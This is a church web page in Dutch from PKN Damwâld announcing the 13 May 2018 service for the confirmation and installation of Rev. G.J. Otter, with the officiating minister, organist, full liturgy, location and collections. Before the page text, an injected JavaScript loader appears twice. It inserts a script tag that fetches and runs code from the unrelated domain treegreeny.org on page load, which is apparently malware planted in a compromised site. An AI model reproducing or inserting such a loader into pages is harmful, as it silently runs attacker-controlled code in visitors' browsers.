;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bevestiging en intrede ds. G.J. Otter - PKN Damwâld
zondag 13 mei 2018
15:00 uur
Iedereen is van harte uitgenodigd !

Bevestiging en intrede ds. G.J. Otter

Informatie

Voorganger:Ds. H. Dekker, Marken
Organist:Ivo van Hijum
Mededeling:Iedereen is van harte uitgenodigd !
Liturgie
Lied voor de dienst Gez. 330: 1, 3
Welkom en mededelingen
Aanvangslied: Ps. 135: 1, 10
Stil gebed, Votum en Groet
We zingen: Gez. 314: 1, 2
Geloofsbelijdenis .
We zingen: Ps. 117
Inleidend woord op de bevestiging
Formulier voor de verbintenis van een dienaar des Woords: .
Bevestiging: .
Toezingen: tekst dr. A.F. Troost, melodie Gez. 239 (staande) .
Overdracht leiding kerkdienst door ds. H. Dekker aan ds. G.J. Otter
Gebed om de verlichting met de Heilige Geest
We lezen: 2 Kor. 3: 17 – 4: 18
Bijdrage Kingkids
We zingen: Elb 479: 1, 2
Preek .
We zingen: Ps. 103: 5, 9
Dankgebed en voorbede
Collecte
Slotlied Gez. 477: 1, 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk